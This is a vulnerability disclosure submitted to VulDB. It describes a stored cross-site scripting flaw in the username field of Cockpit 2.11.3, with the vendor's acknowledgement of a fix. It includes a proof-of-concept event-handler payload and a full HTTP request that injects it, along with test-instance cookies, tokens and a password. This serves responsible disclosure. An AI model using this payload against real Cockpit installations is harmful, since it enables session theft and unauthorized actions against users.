| Titel | agentejo cockpit 2.11.3 Cross Site Scripting |
|---|
| Beschreibung | Stored Cross-Site Scripting (XSS) in Cockpit (Version 2.11.3)
Summary:
A stored Cross-Site Scripting (XSS) vulnerability was discovered in Cockpit (version 2.11.3). The vulnerability exists in the handling of the username field (name parameter) at the endpoint /system/users/save. Although basic <script> tags appear blocked, special characters, specifically quotes ("), are not sanitized. This oversight allows injection of malicious JavaScript via HTML event handlers, resulting in stored XSS.
Application Setup:
To replicate and confirm the vulnerability, the following Docker setup was used:
docker pull cockpithq/cockpit:pro-2.11.3-unit
docker run -p 80:80 cockpithq/cockpit:pro-2.11.3-unit
Impact:
Exploitation of stored XSS in this scenario could enable attackers to:
Execute arbitrary JavaScript in victim users' browsers.
Steal session cookies and sensitive information (cookies lack the HttpOnly flag).
Perform unauthorized actions on behalf of affected users.
Proof-of-Concept (PoC):
Injecting the following payload into the username:
Admin" onmouseover="alert(42)
Results in vulnerable HTML rendering:
<app-avatar size="30" name="Admin" onmouseover="alert(42)"></app-avatar>
Hovering over the avatar triggers JavaScript execution.
Request payload used to inject payload:
POST /system/users/save HTTP/1.1
Host: 127.0.0.1
Content-Length: 333
sec-ch-ua-platform: "Linux"
X-CSRF-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc3JmIjoiYXBwLmNzcmYuZmRjZGVkYTVlODdiNDY4MmJiMjQ0OTQzNWQwMTU5OGFjZDc0Njc1ZjdiYzM0YWY1MjY2MDNmNzFmNDcwYmUxZSJ9.wZcnZTP86PYoPkZMUFNoIoNB7qNcxx_BKU8IWffNdd4
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Content-Type: application/json; charset=UTF-8
Accept: */*
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/system/users/user
Accept-Encoding: gzip, deflate, br
Cookie: azuriom_locale=en; 5ae2ad4c5addb4171a3413defb13ef9f=06034f74fba51176dc0df2a93f6e142c; 40d1b2d83998fabacb726e5bc3d22129=2c332589afc11b2cbf254a7d2d3b5bb5
Connection: keep-alive
{"user":{"active":true,"user":"admin","name":"Admin\" onmouseover=\"alert(42)","email":"[email protected]","i18n":"en","role":"admin","theme":"auto","_modified":1751016885,"_created":1751010682,"_id":"685e4d7a6ff7246c990a3090","twofa":{"enabled":false,"secret":"BD67DK7WQUF52S5N4XDHY7OJKNJHNWSH"},"_meta":{}},"password":"9zigBqaTs8z5"}
Additional Evidence:
Screenshots illustrating vulnerability exploitation are available via the following links (should be valid for 6 months):
https://ibb.co/7d3jKCCz
https://ibb.co/BH8dPmbF
https://ibb.co/3yFD2XCJ
https://ibb.co/ZpJ79kWM
https://ibb.co/twb0mX1m
https://ibb.co/P31LRpt
https://ibb.co/xSnR16Wh
https://ibb.co/qLN0bqV5
https://ibb.co/PzxPQDKQ
Vendor Response:
The Cockpit development team acknowledged the vulnerability, confirmed its existence, and noted the issue has been patched in the development branch. A fix is scheduled for release within the next week.
Vendor Email:
"Thank you very much for taking the time to report this issue and for providing a clear and detailed explanation.
I’ve reviewed your findings and can confirm the vulnerability. The issue has already been addressed in the development branch and the fix will be included in the upcoming release scheduled for next week.
I appreciate your responsible disclosure and commitment to improving the security of the application.
Best regards,Artur"
Reported by: Matan Sandori ([email protected]) |
|---|
| Benutzer | MatanS (UID 86894) |
|---|
| Einreichung | 27.06.2025 18:57 (vor 10 Monaten) |
|---|
| Moderieren | 03.07.2025 21:49 (6 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 314819 [Cockpit bis 2.11.3 /system/users/save name/email Cross Site Scripting] |
|---|
| Punkte | 17 |
|---|